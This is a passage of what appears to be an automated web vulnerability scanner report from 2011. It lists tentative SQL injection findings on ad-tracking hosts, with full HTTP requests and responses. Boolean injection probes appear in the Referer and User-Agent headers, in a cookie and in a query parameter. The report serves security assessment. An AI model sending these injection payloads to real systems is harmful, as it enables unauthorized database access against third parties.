ot_b="http"+(ot_d.URL.indexOf('https:')==0?'s://':'://')+'a02.opentracker.net';
if(typeof(top.document)=="object") ot_r=top.document;else ot_r=ot_d;
ot_c=ot_r;
ot_cd=(new Date("December 31, 2023")).toGMTString();ot_cld=new Date();ot_fv=false;ot_ac=false;
if (typeof ot_ti===ot_un) {
ot_ti=ot_d.title;
}
ot_ti=escape(ot_ti);if (ot_ti.indexOf('%u')!=-1) ot_ti=escape(ot_ti);
ot_mj=parseInt(navigator.appVersion);if(ot_mj>=5){if(ot_d.referrer.indexOf(ot_r.location.hostname)==-1)ot_r=ot_d;}else{ot_r=document;}
if(ot_c.cookie.indexOf('machine-id')!=-1)ot_ac=true;else{
if(ot_c.cookie.indexOf('machine-id')==-1) f_sc("machine-id","173.193.214.243:1308222969806",ot_cd,"/");
if(ot_c.cookie.indexOf('machine-id')!=-1)ot_ac=true;
}
ot_rc=f_rc("machine-id");ot_lc=escape((typeof ot_url===ot_un)?ot_d.location:ot_url);ot_t0=1308222969806;

function f_log() {
ot_im=new Image(1,1);
ot_im.src=ot_b+'/collect.jsp?p=1&mid='+ot_rc
+'&fv='+ot_fv+'&ti='+ot_ti+'&si=nicusa.com18703088' or 1=1-- '
+ot_goal+ot_clv
+'&sh='+screen.height+'&sw='+screen.width
+'&sc='+screen.pixelDepth+ot_goal+ot_clv
+'&lc='+ot_lc+'&ref='+escape(ot_r.referrer)
+'&t0='+ot_t0;
}

function f_sc(n,v,h,p,d,s){
ot_fv=true;ot_c.cookie=n+'='+escape(v)+((h)?(';expires='+h):'')+((p)?';path='+p:'')+((d)?';domain='+d:'')+((s && (s==true))?'; secure':'');
}

function f_rc(n){
if(ot_c.cookie=='')return false;else{
var fc,lc;var tbc=ot_c.cookie;fc=tbc.indexOf(n);var NN2Hack=fc+n.length;
if((fc != -1) && (tbc.charAt(NN2Hack)=='=')){
fc += n.length+1;lc=tbc.indexOf(';',fc);
if(lc==-1)lc=tbc.length;return unescape(tbc.substring(fc,lc));
}else{return false;}
}
}

function ot_f(e) {
et=e.target;
ot_o=et;
if (ot_o.caught==true)
...[SNIP]...

Request 2

GET /?site=nicusa.com18703088'%20or%201%3d2--%20 HTTP/1.1
Host: script.footprintlive.com
Proxy-Connection: keep-alive
Referer: http://www.egov.com/Pages/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/javascript;charset=UTF-8
Date: Thu, 16 Jun 2011 11:16:10 GMT
Server: Apache-Coyote/1.1
Content-Length: 1
Connection: keep-alive



1.15. http://tap.rubiconproject.com/oz/sensor [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=14&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,southern:72,transfer:72,related+links:64,please+respect:64,cnbc+welcomes:64,posted+yet:64,cnbc+highlights:64,must+click:64,cnbc+reserves:64,datetime+05:56,2011:56,asia+pacific:56,2011+5:48,5+42:48,6+16:48,expiration+datetime:48,16+2011:48,special+reports:48,datetime+6:48,datetime:46,billion:46,will+benefit:40,energy+news:40,equity+will:40,burgeoning+u:40,union+company:40,gas+production:40,transfer+equity:40,datetime+11:40,midstream+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d1--%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=21|4|17|0; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%262374%3D1; rdk2=0; ses2=11953^6; csi2=3187870.js^5^1308226504^1308228061&3183300.js^1^1308227126^1308227126; rdk=6451/11953; rdk15=0; ses15=11953^11; csi15=3187871.js^8^1308225219^1308228064&3206204.js^3^1308225202^1308227128

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:14:02 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 13:14:02 GMT; Path=/
Set-Cookie: dq=27|4|23|0; Expires=Fri, 15-Jun-2012 13:14:02 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=14&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,southern:72,transfer:72,related+links:64,please+respect:64,cnbc+welcomes:64,posted+yet:64,cnbc+highlights:64,must+click:64,cnbc+reserves:64,datetime+05:56,2011:56,asia+pacific:56,2011+5:48,5+42:48,6+16:48,expiration+datetime:48,16+2011:48,special+reports:48,datetime+6:48,datetime:46,billion:46,will+benefit:40,energy+news:40,equity+will:40,burgeoning+u:40,union+company:40,gas+production:40,transfer+equity:40,datetime+11:40,midstream+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d2--%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=21|4|17|0; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%262374%3D1; rdk2=0; ses2=11953^6; csi2=3187870.js^5^1308226504^1308228061&3183300.js^1^1308227126^1308227126; rdk=6451/11953; rdk15=0; ses15=11953^11; csi15=3187871.js^8^1308225219^1308228064&3206204.js^3^1308225202^1308227128

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:14:02 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.16. http://tap.rubiconproject.com/oz/sensor [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=87&k=southern+union:328,energy+transfer:288,buy+southern:184,4+billion:144,linkslist+documentid:136,current+datetime:136,cnbc:122,energy:112,billion+cnbc:80,southern:72,transfer:72,datetime+11:72,union:72,must+click:64,please+respect:64,cnbc+welcomes:64,cnbc+reserves:64,posted+yet:64,cnbc+highlights:64,related+links:64,2011:56,asia+pacific:56,datetime+6:48,2011+11:48,16+2011:48,11+06:48,6+16:48,special+reports:48,expiration+datetime:48,datetime:46,billion:46,energy+news:40,burgeoning+u:40,union+company:40,will+buy:40,transfer+equity:40,large+midstream:40,midstream+company:40,will+benefit:40,transfer+partners:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24'%20and%201%3d1--%20
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1; put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; cd=false; dq=75|4|71|0; csi2=1300433.js^27^1308237983^1308247606&3173951.js^1^1308241389^1308241389&2553662.js^15^1308233336^1308240157&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; csi15=1300434.js^29^1308237982^1308247605&3173952.js^1^1308241079^1308241079&2553663.js^20^1308234261^1308240767&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128; ses2=11953^63; rdk=6451/11953; ses15=11953^72

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 18:07:58 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 18:06:06 GMT; Path=/
Set-Cookie: dq=77|4|73|0; Expires=Fri, 15-Jun-2012 18:06:06 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=87&k=southern+union:328,energy+transfer:288,buy+southern:184,4+billion:144,linkslist+documentid:136,current+datetime:136,cnbc:122,energy:112,billion+cnbc:80,southern:72,transfer:72,datetime+11:72,union:72,must+click:64,please+respect:64,cnbc+welcomes:64,cnbc+reserves:64,posted+yet:64,cnbc+highlights:64,related+links:64,2011:56,asia+pacific:56,datetime+6:48,2011+11:48,16+2011:48,11+06:48,6+16:48,special+reports:48,expiration+datetime:48,datetime:46,billion:46,energy+news:40,burgeoning+u:40,union+company:40,will+buy:40,transfer+equity:40,large+midstream:40,midstream+company:40,will+benefit:40,transfer+partners:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24'%20and%201%3d2--%20
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1; put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; cd=false; dq=75|4|71|0; csi2=1300433.js^27^1308237983^1308247606&3173951.js^1^1308241389^1308241389&2553662.js^15^1308233336^1308240157&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; csi15=1300434.js^29^1308237982^1308247605&3173952.js^1^1308241079^1308241079&2553663.js^20^1308234261^1308240767&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128; ses2=11953^63; rdk=6451/11953; ses15=11953^72

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 18:07:58 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.17. http://tap.rubiconproject.com/oz/sensor [cd cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The cd cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the cd cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=13&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,transfer:72,southern:72,posted+yet:64,cnbc+welcomes:64,must+click:64,cnbc+highlights:64,please+respect:64,cnbc+reserves:64,related+links:64,2011:56,asia+pacific:56,datetime+05:56,5+27:48,6+16:48,05+24:48,2011+5:48,16+2011:48,special+reports:48,expiration+datetime:48,datetime+6:48,datetime:46,billion:46,equity+will:40,energy+news:40,will+benefit:40,will+buy:40,datetime+11:40,24+54:40,burgeoning+u:40,union+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false'%20and%201%3d1--%20; dq=19|4|15|0; rdk2=0; ses2=11953^3; csi2=3183300.js^1^1308227126^1308227126&3187870.js^2^1308226504^1308226815; rdk=6451/11953; rdk15=0; ses15=11953^8; csi15=3206204.js^3^1308225202^1308227128&3187871.js^5^1308225219^1308226816; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:10:17 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 13:10:17 GMT; Path=/
Set-Cookie: dq=27|4|23|0; Expires=Fri, 15-Jun-2012 13:10:17 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=13&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,transfer:72,southern:72,posted+yet:64,cnbc+welcomes:64,must+click:64,cnbc+highlights:64,please+respect:64,cnbc+reserves:64,related+links:64,2011:56,asia+pacific:56,datetime+05:56,5+27:48,6+16:48,05+24:48,2011+5:48,16+2011:48,special+reports:48,expiration+datetime:48,datetime+6:48,datetime:46,billion:46,equity+will:40,energy+news:40,will+benefit:40,will+buy:40,datetime+11:40,24+54:40,burgeoning+u:40,union+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false'%20and%201%3d2--%20; dq=19|4|15|0; rdk2=0; ses2=11953^3; csi2=3183300.js^1^1308227126^1308227126&3187870.js^2^1308226504^1308226815; rdk=6451/11953; rdk15=0; ses15=11953^8; csi15=3206204.js^3^1308225202^1308227128&3187871.js^5^1308225219^1308226816; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:10:17 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.18. http://tap.rubiconproject.com/oz/sensor [cd parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The cd parameter appears to be vulnerable to SQL injection attacks. The payloads 12779497'%20or%201%3d1--%20 and 12779497'%20or%201%3d2--%20 were each submitted in the cd parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false12779497'%20or%201%3d1--%20&xt=21&k=southern+union:328,energy+transfer:312,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:122,energy:112,billion+cnbc:80,union:72,transfer:72,southern:72,please+respect:64,must+click:64,cnbc+reserves:64,cnbc+highlights:64,related+links:64,cnbc+welcomes:64,posted+yet:64,2011:56,asia+pacific:56,datetime+08:56,expiration+datetime:48,datetime+6:48,16+2011:48,2011+8:48,8+12:48,6+16:48,special+reports:48,billion:46,datetime:46,union+company:40,will+buy:40,11+billion:40,transfer+partners:40,midstream+company:40,burgeoning+u:40,large+midstream:40,will+benefit:40,energy+news:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; cd=false; dq=44|4|40|0; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%263512%3D1%262197%3D1%262579%3D1%263811%3D1%262374%3D1; rdk2=0; ses2=11953^34; csi2=2553662.js^8^1308233336^1308237059&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; rdk=6451/11953; rdk15=0; ses15=11953^40; csi15=2553663.js^9^1308234261^1308237048&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 15:11:16 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 15:11:16 GMT; Path=/
Set-Cookie: dq=46|4|42|0; Expires=Fri, 15-Jun-2012 15:11:16 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

